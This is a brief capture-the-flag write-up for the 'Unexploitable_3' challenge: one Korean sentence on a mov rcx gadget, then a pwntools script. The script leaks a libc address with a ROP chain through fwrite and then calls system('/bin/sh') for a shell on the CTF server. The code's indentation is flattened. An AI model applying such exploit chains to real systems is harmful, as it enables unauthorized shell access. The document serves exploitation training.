Unexploitable_3

이 문제는 언뜻 보기에 쓸만한 가젯이 없어 보이지만 친절하게 mov rcx, [rdi];가젯이 있어서 fwrite를 호출할 수 있다.

	import sys
	from pwn import *
	if len(sys.argv) != 2:
	print "sys.argv[1] = r : remote l : local"
	exit()
	#context.log_level = 'debug'
	if sys.argv[1].strip() == 'l':
	p = process('./Unexploitable_3')
	elif sys.argv[1].strip() == 'r':
	p = remote('ctf.j0n9hyun.xyz',3034)
	e = ELF('./Unexploitable_3')
	if sys.argv[1].strip() == 'l':
	l = e.libc
	elif sys.argv[1].strip() == 'r':
	l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	pause()
	stdout = 0x601050
	stdin = 0x601060
	main = 0x40065F
	m_rcx_rdi = 0x400658
	p_rdi_ret = 0x0000000000400743
	p_rsi_r15_ret = 0x0000000000400741
	pay = 'a' * 0x10
	pay += p64(0)
	pay += p64(p_rdi_ret)
	pay += p64(stdout)
	pay += p64(m_rcx_rdi)
	pay += p64(p_rdi_ret)
	pay += p64(e.got['fwrite'])
	pay += p64(p_rsi_r15_ret)
	pay += p64(1)
	pay += p64(0)
	pay += p64(e.plt['fwrite'])
	pay += p64(main)
	p.recvuntil("Impossible RTL ha? Nothing for you!\n")
	p.sendline(pay)
	libc = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - l.sym['fwrite']
	log.info("libc leak : " + hex(libc))
	pay = 'a' * 0x10
	pay += p64(0)
	pay += p64(p_rdi_ret)
	pay += p64(libc + next(l.search("/bin/sh\x00")))
	pay += p64(libc + l.sym['system'])
	p.recvuntil("Impossible RTL ha? Nothing for you!\n")
	p.sendline(pay)
	p.interactive()

view raw Unexploitable_3.py hosted with ❤ by GitHub